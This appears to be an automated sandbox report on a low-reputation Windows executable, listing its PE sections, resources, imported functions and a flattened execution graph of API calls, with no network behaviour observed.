  • [ C ] VS2008 SP1 build 30729
  • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3e380 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3e3b4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x66000 | 0xdff8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x74000 | 0x23dc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3c1b0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x366a8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x34000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3d85c | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x32dbc | 0x32e00 | 59fca22eb14bf065790ccabf936fb764 | False | 0.5921807816339066 | data | 6.705384121865264 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x34000 | 0xb1d0 | 0xb200 | 3d7416119125f570d6c385b5ba208d7a | False | 0.46034497893258425 | data | 5.270635796862559 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x40000 | 0x24750 | 0x1200 | edc39ed5cd62e969c2b4607a1a95cf98 | False | 0.4058159722222222 | data | 4.083550519415643 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x65000 | 0x1a4 | 0x200 | 185ed7102f068a73891dd850643e3d14 | False | 0.46484375 | data | 3.50335535460232 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x66000 | 0xdff8 | 0xe000 | 699399d7d2e63f9a36984a221fc02f75 | False | 0.6373465401785714 | data | 6.63871928699419 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x74000 | 0x23dc | 0x2400 | 539b0c53eda4d1d9ffe2e69d5037d71f | False | 0.7864583333333334 | data | 6.678617573231213 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
NameRVASizeTypeLanguageCountryZLIB Complexity
PNG0x666500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
PNG | 0x67198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x68748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x68cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x69558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x6a400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x6a868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x6b910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6deb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x72588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x72358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x72498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x72228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x71ef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x71c98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x72f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x73150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x73320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x734d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x73620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x73a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x73bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x73d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x73e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x73f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x71c30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x72810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken
English | United States
No network behavior found

Target ID: 0
Start time: 09:41:20
Start date: 30/09/2024
Path: C:\Users\user\Desktop\MpkkG8XzhJ.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\MpkkG8XzhJ.exe"
Imagebase: 0xb0000
File size: 344'623 bytes
MD5 hash: 51570F6E590151159F4761E2FB4ECD60
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

    Execution Graph

    Execution Coverage: 9.6%
    Dynamic/Decrypted Code Coverage: 0%
    Signature Coverage: 9.9%
    Total number of Nodes: 1549
    Total number of Limit Nodes: 45
25222 ba968 CreateFileW 25221->25222 25222->25219 25223->25134 25224->25141 25225->25156 25227 cd87c __EH_prolog 25226->25227 25228 ccfbb 25227->25228 25366 cc4f4 ExpandEnvironmentStringsW 25227->25366 25228->25168 25232 cdb9a SetWindowTextW 25234 cd8b3 _wcslen _wcsrchr 25232->25234 25234->25228 25234->25232 25238 cd988 SetFileAttributesW 25234->25238 25241 cd9a2 __cftof _wcslen 25234->25241 25367 c3306 CompareStringW 25234->25367 25368 cb64d GetCurrentDirectoryW 25234->25368 25370 bb9ca 6 API calls 25234->25370 25371 bb953 FindClose 25234->25371 25372 cc66e 77 API calls 2 library calls 25234->25372 25373 d520e 25234->25373 25386 cc4f4 ExpandEnvironmentStringsW 25234->25386 25240 cda42 GetFileAttributesW 25238->25240 25238->25241 25240->25234 25242 cda54 DeleteFileW 25240->25242 25241->25234 25241->25240 25244 cdd64 GetDlgItem SetWindowTextW SendMessageW 25241->25244 25247 cdda4 SendMessageW 25241->25247 25369 bcdc0 51 API calls 2 library calls 25241->25369 25242->25234 25245 cda65 25242->25245 25244->25241 25246 b4a20 _swprintf 51 API calls 25245->25246 25248 cda85 GetFileAttributesW 25246->25248 25247->25234 25248->25245 25249 cda9a MoveFileW 25248->25249 25249->25234 25250 cdab2 MoveFileExW 25249->25250 25250->25234 25252 ceb9c __EH_prolog 25251->25252 25398 c197c 25252->25398 25254 cebcd 25402 b64ed 25254->25402 25256 cebeb 25406 b8823 25256->25406 25260 cec3e 25424 b890a 25260->25424 25262 ccfda 25262->25177 25264 ce7e8 25263->25264 25265 cb5c6 4 API calls 25264->25265 25266 ce7ed 25265->25266 25267 ce7f5 GetWindow 25266->25267 25269 cd101 25266->25269 25268 ce815 25267->25268 25267->25269 25268->25269 25270 ce822 GetClassNameW 25268->25270 25272 ce8aa GetWindow 25268->25272 25273 ce846 GetWindowLongW 25268->25273 25269->25030 25269->25031 25930 c3306 CompareStringW 25270->25930 25272->25268 25272->25269 25273->25272 25274 ce856 SendMessageW 25273->25274 25274->25272 25275 ce86c GetObjectW 25274->25275 25931 cb605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 
25275->25931 25277 ce883 25932 cb5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25277->25932 25933 cb80c 9 API calls 25277->25933 25280 ce894 SendMessageW DeleteObject 25280->25272 25281->25046 25283 cbbd1 25282->25283 25289 cbbf6 25282->25289 25934 c3306 CompareStringW 25283->25934 25285 cbbfb SHAutoComplete 25286 cbc04 25285->25286 25290 cc207 25286->25290 25287 cbbe4 25288 cbbe8 FindWindowExW 25287->25288 25287->25289 25288->25289 25289->25285 25289->25286 25291 cc211 __EH_prolog 25290->25291 25292 b13f8 43 API calls 25291->25292 25293 cc233 25292->25293 25935 b2083 25293->25935 25296 cc25c 25299 b1a7e 143 API calls 25296->25299 25297 cc24d 25298 b1641 87 API calls 25297->25298 25300 cc258 25298->25300 25302 cc27b __InternalCxxFrameHandler ___std_exception_copy 25299->25302 25300->25072 25300->25075 25301 b1641 87 API calls 25301->25300 25302->25301 25303->25117 25943 bb4d3 25304->25943 25307->25078 25308->25139 25309->25162 25310->25167 25311->25171 25312->25176 25313->25184 25951 cac14 LoadCursorW RegisterClassExW 25314->25951 25316 caf0f 25319 caf25 25316->25319 25952 d8a08 26 API calls 2 library calls 25316->25952 25318 caf3d GetWindowRect GetParent MapWindowPoints 25322 caf77 DestroyWindow 25318->25322 25323 caf80 GetParent CreateWindowExW 25318->25323 25319->25318 25953 d8a08 26 API calls 2 library calls 25319->25953 25322->25323 25324 cb008 25323->25324 25325 cafcb 25323->25325 25326 cb00c ShowWindow UpdateWindow 25324->25326 25327 cb01e 25324->25327 25325->25324 25328 cafd0 25325->25328 25326->25327 25327->25116 25328->25327 25954 cad0e CompareStringW _wcslen ___std_exception_copy 25328->25954 25330 cafe8 25330->25327 25331 cafee ShowWindow SetWindowTextW 25330->25331 25332 cb005 25331->25332 25332->25327 25333->25105 25334->25095 25335->25192 25336->25190 25338 cc79c GetDlgItem 25337->25338 25339 cc763 KiUserCallbackDispatcher 25337->25339 25338->25200 25338->25201 25340 cc788 TranslateMessage DispatchMessageW 25339->25340 25341 cc779 IsDialogMessageW 
25339->25341 25340->25338 25341->25338 25341->25340 25343 ca23e DestroyWindow 25342->25343 25344 ca24b ShowWindow SendMessageW SendMessageW 25342->25344 25343->25344 25344->25200 25346 bb54f 25345->25346 25347 bb573 25346->25347 25348 bb566 CreateDirectoryW 25346->25348 25349 bb4c1 3 API calls 25347->25349 25348->25347 25350 bb5a6 25348->25350 25351 bb579 25349->25351 25353 bb5b5 25350->25353 25358 bb8e6 25350->25358 25352 bb5b9 GetLastError 25351->25352 25354 bcf32 GetCurrentDirectoryW 25351->25354 25352->25353 25353->25211 25356 bb58f 25354->25356 25356->25352 25357 bb593 CreateDirectoryW 25356->25357 25357->25350 25357->25352 25359 cffc0 25358->25359 25360 bb8f3 SetFileAttributesW 25359->25360 25361 bb909 25360->25361 25362 bb936 25360->25362 25363 bcf32 GetCurrentDirectoryW 25361->25363 25362->25353 25364 bb91d 25363->25364 25364->25362 25365 bb921 SetFileAttributesW 25364->25365 25365->25362 25366->25234 25367->25234 25368->25234 25369->25241 25370->25234 25371->25234 25372->25234 25374 da694 25373->25374 25375 da6ac 25374->25375 25376 da6a1 25374->25376 25378 da6b4 25375->25378 25384 da6bd _abort 25375->25384 25387 da7ee 25376->25387 25381 da65a _free 20 API calls 25378->25381 25379 da6e7 HeapReAlloc 25383 da6a9 25379->25383 25379->25384 25380 da6c2 25394 da7db 20 API calls _abort 25380->25394 25381->25383 25383->25234 25384->25379 25384->25380 25395 d8e4c 7 API calls 2 library calls 25384->25395 25386->25234 25388 da82c 25387->25388 25392 da7fc _abort 25387->25392 25397 da7db 20 API calls _abort 25388->25397 25390 da817 RtlAllocateHeap 25391 da82a 25390->25391 25390->25392 25391->25383 25392->25388 25392->25390 25396 d8e4c 7 API calls 2 library calls 25392->25396 25394->25383 25395->25384 25396->25392 25397->25391 25399 c1989 _wcslen 25398->25399 25433 b1895 25399->25433 25401 c19a1 25401->25254 25403 c197c _wcslen 25402->25403 25404 b1895 79 API calls 25403->25404 25405 c19a1 25404->25405 25405->25256 25407 b882d __EH_prolog 25406->25407 25446 be298 
25407->25446 25409 b8855 25410 cfeae 27 API calls 25409->25410 25411 b8899 __cftof 25410->25411 25412 cfeae 27 API calls 25411->25412 25413 b88c0 25412->25413 25452 c5c54 25413->25452 25416 b8a38 25417 b8a42 25416->25417 25418 b8ab5 25417->25418 25481 bb966 25417->25481 25422 b8b1a 25418->25422 25459 b90a2 25418->25459 25420 b8b5c 25420->25260 25422->25420 25487 b1397 75 API calls 25422->25487 25918 ba41a DeleteFileW DeleteFileW GetCurrentDirectoryW __cftof 25424->25918 25426 b892b 25428 b893c Concurrency::cancel_current_task 25426->25428 25919 c3536 25426->25919 25429 b2111 26 API calls 25428->25429 25430 b8963 25429->25430 25431 be339 87 API calls 25430->25431 25432 b896b 25431->25432 25432->25262 25434 b18ff 25433->25434 25435 b18a7 25433->25435 25434->25401 25436 b18d0 25435->25436 25443 b76e9 77 API calls __vswprintf_c_l 25435->25443 25438 d520e 22 API calls 25436->25438 25440 b18f0 25438->25440 25439 b18c6 25444 b775a 76 API calls 25439->25444 25440->25434 25445 b775a 76 API calls 25440->25445 25443->25439 25444->25436 25445->25434 25447 be2a2 __EH_prolog 25446->25447 25448 cfeae 27 API calls 25447->25448 25449 be2e5 25448->25449 25450 cfeae 27 API calls 25449->25450 25451 be309 25450->25451 25451->25409 25453 c5c5e __EH_prolog 25452->25453 25454 cfeae 27 API calls 25453->25454 25455 c5c7a 25454->25455 25456 b88f2 25455->25456 25458 c215f 81 API calls 25455->25458 25456->25416 25458->25456 25460 b90ac __EH_prolog 25459->25460 25488 b13f8 25460->25488 25462 b90c8 25463 b90d9 25462->25463 25650 bb1d2 25462->25650 25467 b9110 25463->25467 25498 b1ad3 25463->25498 25466 b910c 25466->25467 25517 b2032 25466->25517 25642 b1641 25467->25642 25471 b91b2 25521 b924e 25471->25521 25474 b9211 25474->25467 25529 b4264 25474->25529 25541 b92c6 25474->25541 25479 bb966 7 API calls 25480 b9139 25479->25480 25480->25471 25480->25479 25654 bd4d2 CompareStringW _wcslen 25480->25654 25482 bb97b 25481->25482 25483 bb9a9 25482->25483 25907 bba94 25482->25907 25483->25417 25485 
bb98b 25485->25483 25486 bb990 FindClose 25485->25486 25486->25483 25487->25420 25489 b13fd __EH_prolog 25488->25489 25490 be298 27 API calls 25489->25490 25491 b1437 25490->25491 25492 cfeae 27 API calls 25491->25492 25496 b14ab 25491->25496 25494 b1498 25492->25494 25494->25496 25497 b644d 43 API calls 25494->25497 25495 b1533 __cftof 25495->25462 25655 bc1f7 25496->25655 25497->25496 25499 b1add __EH_prolog 25498->25499 25505 b1b30 25499->25505 25511 b1c63 25499->25511 25673 b13d9 25499->25673 25501 b1c9e 25676 b1397 75 API calls 25501->25676 25504 b4264 116 API calls 25510 b1ce9 25504->25510 25505->25501 25506 b1cab 25505->25506 25505->25511 25506->25504 25506->25511 25507 b1d31 25508 b1d64 25507->25508 25507->25511 25677 b1397 75 API calls 25507->25677 25508->25511 25515 bb110 80 API calls 25508->25515 25510->25507 25512 b4264 116 API calls 25510->25512 25511->25466 25512->25510 25513 b4264 116 API calls 25514 b1db5 25513->25514 25514->25511 25514->25513 25515->25514 25516 bb110 80 API calls 25516->25505 25518 b2037 __EH_prolog 25517->25518 25520 b2068 25518->25520 25691 b1a7e 25518->25691 25520->25480 25696 be395 25521->25696 25523 b925e 25700 c26f1 GetSystemTime SystemTimeToFileTime 25523->25700 25525 b91cc 25525->25474 25526 c2ea4 25525->25526 25705 cef9b 25526->25705 25530 b4270 25529->25530 25531 b4274 25529->25531 25530->25474 25540 bb110 80 API calls 25531->25540 25532 b4286 25533 b42af 25532->25533 25534 b42a1 25532->25534 25714 b2eb6 116 API calls 3 library calls 25533->25714 25539 b42e1 25534->25539 25713 b395a 104 API calls 3 library calls 25534->25713 25537 b42ad 25537->25539 25715 b2544 75 API calls 25537->25715 25539->25474 25540->25532 25542 b92d0 __EH_prolog 25541->25542 25545 b930e 25542->25545 25560 b973d Concurrency::cancel_current_task 25542->25560 25756 c9c9d 118 API calls 25542->25756 25544 ba18d 25546 ba192 25544->25546 25547 ba1c5 25544->25547 25545->25544 25550 b932f 25545->25550 25545->25560 25546->25560 25787 b8675 167 API calls 
25546->25787 25547->25560 25788 c9c9d 118 API calls 25547->25788 25550->25560 25716 b66df 25550->25716 25552 b9545 25555 b9669 25552->25555 25552->25560 25759 b8f6b 39 API calls 25552->25759 25554 b9405 25554->25552 25757 bb5d6 57 API calls 3 library calls 25554->25757 25562 bb966 7 API calls 25555->25562 25564 b96db 25555->25564 25559 b95ac 25758 d8a08 26 API calls 2 library calls 25559->25758 25560->25474 25562->25564 25563 b9935 25766 be4a9 97 API calls 25563->25766 25722 b89c8 25564->25722 25567 b976c 25589 b97c5 25567->25589 25760 b4727 27 API calls 2 library calls 25567->25760 25570 b9a3a 25574 b9a8c 25570->25574 25586 b9a45 25570->25586 25571 b9990 25571->25570 25575 b99bb 25571->25575 25580 b9a2c 25574->25580 25770 b8db3 120 API calls 25574->25770 25577 bb4c1 3 API calls 25575->25577 25575->25580 25583 b9ae8 25575->25583 25576 b9a8a 25581 ba801 81 API calls 25576->25581 25582 b99f3 25577->25582 25578 ba801 81 API calls 25578->25560 25580->25576 25580->25583 25581->25560 25582->25580 25768 ba50a 98 API calls 25582->25768 25600 b9b53 25583->25600 25630 ba14a 25583->25630 25771 bab1c 25583->25771 25586->25576 25769 b8b7c 124 API calls 25586->25769 25587 b9ba2 25592 bbf0a 27 API calls 25587->25592 25588 b98ed 25765 b237a 75 API calls 25588->25765 25589->25560 25589->25588 25596 b98f4 Concurrency::cancel_current_task 25589->25596 25761 b87fb 41 API calls 25589->25761 25762 be4a9 97 API calls 25589->25762 25763 b237a 75 API calls 25589->25763 25764 b8f28 99 API calls 25589->25764 25607 b9bb8 25592->25607 25596->25571 25767 b851f 50 API calls 2 library calls 25596->25767 25598 b9b41 25775 b7951 78 API calls 25598->25775 25728 bbf0a 25600->25728 25601 b9c8b 25602 b9ce7 25601->25602 25603 b9e85 25601->25603 25606 b9cff 25602->25606 25613 b9da7 25602->25613 25604 b9eab 25603->25604 25605 b9e97 25603->25605 25612 b9d20 25603->25612 25732 c4576 25604->25732 25782 ba475 138 API calls __EH_prolog 25605->25782 25609 b9d46 25606->25609 25615 b9d0e 25606->25615 25607->25601 
25619 baa7a 80 API calls 25607->25619 25623 b9c62 25607->25623 25609->25612 25778 b829b 112 API calls 25609->25778 25611 b9ec4 25742 c421f 25611->25742 25621 b9e76 25612->25621 25633 b9fca 25612->25633 25783 b237a 75 API calls 25612->25783 25779 b8f6b 39 API calls 25613->25779 25777 b237a 75 API calls 25615->25777 25619->25623 25621->25474 25622 b9dec 25622->25612 25624 b9e08 25622->25624 25625 b9e1f 25622->25625 25623->25601 25776 bac9c 83 API calls 25623->25776 25780 b8037 86 API calls 25624->25780 25781 ba212 104 API calls __EH_prolog 25625->25781 25629 ba0d5 25629->25630 25631 bb8e6 3 API calls 25629->25631 25630->25578 25635 ba130 25631->25635 25632 ba083 25751 bb032 25632->25751 25633->25629 25633->25630 25633->25632 25784 bb199 SetEndOfFile 25633->25784 25635->25630 25785 b237a 75 API calls 25635->25785 25637 ba0ca 25638 ba880 78 API calls 25637->25638 25638->25629 25640 ba140 25786 b7871 77 API calls 25640->25786 25643 b1653 25642->25643 25645 b1665 Concurrency::cancel_current_task 25642->25645 25643->25645 25894 b16b2 25643->25894 25646 b2111 26 API calls 25645->25646 25647 b1694 25646->25647 25897 be339 25647->25897 25651 bb1e9 25650->25651 25652 bb1f3 25651->25652 25906 b77af 79 API calls 25651->25906 25652->25463 25654->25480 25656 bc20d __cftof 25655->25656 25661 bc0d3 25656->25661 25668 bc0b4 25661->25668 25663 bc148 25664 b2111 25663->25664 25665 b212b 25664->25665 25666 b211c 25664->25666 25665->25495 25672 b136b 26 API calls Concurrency::cancel_current_task 25666->25672 25669 bc0bd 25668->25669 25671 bc0c2 25668->25671 25670 b2111 26 API calls 25669->25670 25670->25671 25671->25663 25672->25665 25678 b1822 25673->25678 25676->25511 25677->25508 25679 b1834 25678->25679 25686 b13f2 25678->25686 25680 b185d 25679->25680 25688 b76e9 77 API calls __vswprintf_c_l 25679->25688 25682 d520e 22 API calls 25680->25682 25684 b187a 25682->25684 25683 b1853 25689 b775a 76 API calls 25683->25689 25684->25686 25690 b775a 76 API calls 25684->25690 25686->25516 
25688->25683 25689->25680 25690->25686 25692 b1a8e 25691->25692 25694 b1a8a 25691->25694 25695 b19c5 143 API calls 25692->25695 25694->25520 25695->25694 25697 be3a5 25696->25697 25699 be3ac 25696->25699 25701 baa7a 25697->25701 25699->25523 25700->25525 25702 baa93 25701->25702 25704 bb110 80 API calls 25702->25704 25703 baac5 25703->25699 25704->25703 25706 cefa8 25705->25706 25707 bf937 53 API calls 25706->25707 25708 cefcb 25707->25708 25709 b4a20 _swprintf 51 API calls 25708->25709 25710 cefdd 25709->25710 25711 ce607 17 API calls 25710->25711 25712 c2eba 25711->25712 25712->25474 25713->25537 25714->25537 25715->25539 25717 b66ef 25716->25717 25789 b65fb 25717->25789 25720 b6722 25721 b675a 25720->25721 25794 bc6af CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25720->25794 25721->25554 25723 b89dd 25722->25723 25724 b8a15 25723->25724 25800 b7931 75 API calls 25723->25800 25724->25560 25724->25563 25724->25567 25726 b8a0d 25801 b1397 75 API calls 25726->25801 25729 bbf18 25728->25729 25731 bbf22 25728->25731 25730 cfeae 27 API calls 25729->25730 25730->25731 25731->25587 25733 c458b 25732->25733 25735 c4595 ___std_exception_copy 25732->25735 25802 b775a 76 API calls 25733->25802 25736 c461b 25735->25736 25737 c46c5 25735->25737 25741 c463f __cftof 25735->25741 25803 c44a9 76 API calls 3 library calls 25736->25803 25804 d3330 RaiseException 25737->25804 25740 c46f1 25741->25611 25743 c4228 25742->25743 25744 c4251 25742->25744 25745 c4247 25743->25745 25747 c423d 25743->25747 25750 c4245 25743->25750 25744->25750 25819 c66c4 138 API calls 2 library calls 25744->25819 25818 c739e 133 API calls 25745->25818 25805 c7dcc 25747->25805 25750->25612 25752 bb043 25751->25752 25755 bb052 25751->25755 25753 bb049 FlushFileBuffers 25752->25753 25752->25755 25753->25755 25754 bb0cf SetFileTime 25754->25637 25755->25754 25756->25545 25757->25559 25758->25552 25759->25555 25760->25589 25761->25589 25762->25589 25763->25589 25764->25589 25765->25596 25766->25596 
25767->25571 25768->25580 25769->25576 25770->25580 25772 bab25 GetFileType 25771->25772 25773 b9b2b 25771->25773 25772->25773 25773->25600 25774 b237a 75 API calls 25773->25774 25774->25598 25775->25600 25776->25601 25777->25612 25778->25612 25779->25622 25780->25612 25781->25612 25782->25612 25783->25633 25784->25632 25785->25640 25786->25630 25787->25560 25788->25560 25795 b64f8 25789->25795 25791 b661c 25791->25720 25793 b64f8 2 API calls 25793->25791 25794->25720 25797 b6502 25795->25797 25796 b65ea 25796->25791 25796->25793 25797->25796 25799 bc6af CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25797->25799 25799->25797 25800->25726 25801->25724 25802->25735 25803->25741 25804->25740 25820 c479d 25805->25820 25808 c81ee 25847 c63a9 99 API calls __InternalCxxFrameHandler 25808->25847 25810 c81fe __InternalCxxFrameHandler 25810->25750 25813 c7ddd __InternalCxxFrameHandler 25813->25808 25824 be56c 25813->25824 25833 c229f 25813->25833 25839 c5001 133 API calls 25813->25839 25840 c8243 133 API calls 25813->25840 25841 c24df 25813->25841 25845 c4b0c 99 API calls __InternalCxxFrameHandler 25813->25845 25846 c889f 138 API calls __InternalCxxFrameHandler 25813->25846 25818->25750 25819->25750 25822 c47a7 __cftof ___std_exception_copy __EH_prolog 25820->25822 25821 c4892 25821->25813 25822->25821 25848 b775a 76 API calls 25822->25848 25829 be582 __InternalCxxFrameHandler 25824->25829 25825 be6f2 25826 be726 25825->25826 25849 be523 25825->25849 25853 c2121 25826->25853 25829->25825 25831 be6e9 25829->25831 25859 bbff5 92 API calls __EH_prolog 25829->25859 25860 c9c9d 118 API calls 25829->25860 25831->25813 25834 c22ab 25833->25834 25835 c22b0 25833->25835 25871 c2337 25834->25871 25837 c22c0 25835->25837 25838 c24df 82 API calls 25835->25838 25837->25813 25838->25837 25839->25813 25840->25813 25842 c24eb ResetEvent ReleaseSemaphore 25841->25842 25843 c2516 25841->25843 25886 c22fc WaitForSingleObject 25842->25886 25843->25813 25845->25813 25846->25813 25847->25810 
25848->25822 25850 be52b 25849->25850 25851 be568 25849->25851 25850->25851 25861 c2e58 25850->25861 25851->25826 25854 c2128 25853->25854 25855 c2143 25854->25855 25869 b76e4 RaiseException CallUnexpected 25854->25869 25857 c2154 SetThreadExecutionState 25855->25857 25870 b76e4 RaiseException CallUnexpected 25855->25870 25857->25831 25859->25829 25860->25829 25864 ceead 25861->25864 25865 c15a3 25864->25865 25866 ceec4 SendDlgItemMessageW 25865->25866 25867 cc748 PeekMessageW KiUserCallbackDispatcher IsDialogMessageW TranslateMessage DispatchMessageW 25866->25867 25868 c2e78 25867->25868 25868->25851 25869->25855 25870->25857 25875 c2342 25871->25875 25876 c23b0 25871->25876 25872 c2347 CreateThread 25872->25875 25882 c2470 25872->25882 25874 c239f SetThreadPriority 25874->25875 25875->25872 25875->25874 25875->25876 25879 b76e9 77 API calls __vswprintf_c_l 25875->25879 25880 b7871 77 API calls 25875->25880 25881 b76e4 RaiseException CallUnexpected 25875->25881 25876->25835 25879->25875 25880->25875 25881->25875 25885 c247e 85 API calls 25882->25885 25884 c2479 25885->25884 25887 c230d GetLastError 25886->25887 25888 c2333 25886->25888 25892 b76e9 77 API calls __vswprintf_c_l 25887->25892 25888->25843 25890 c2327 25893 b76e4 RaiseException CallUnexpected 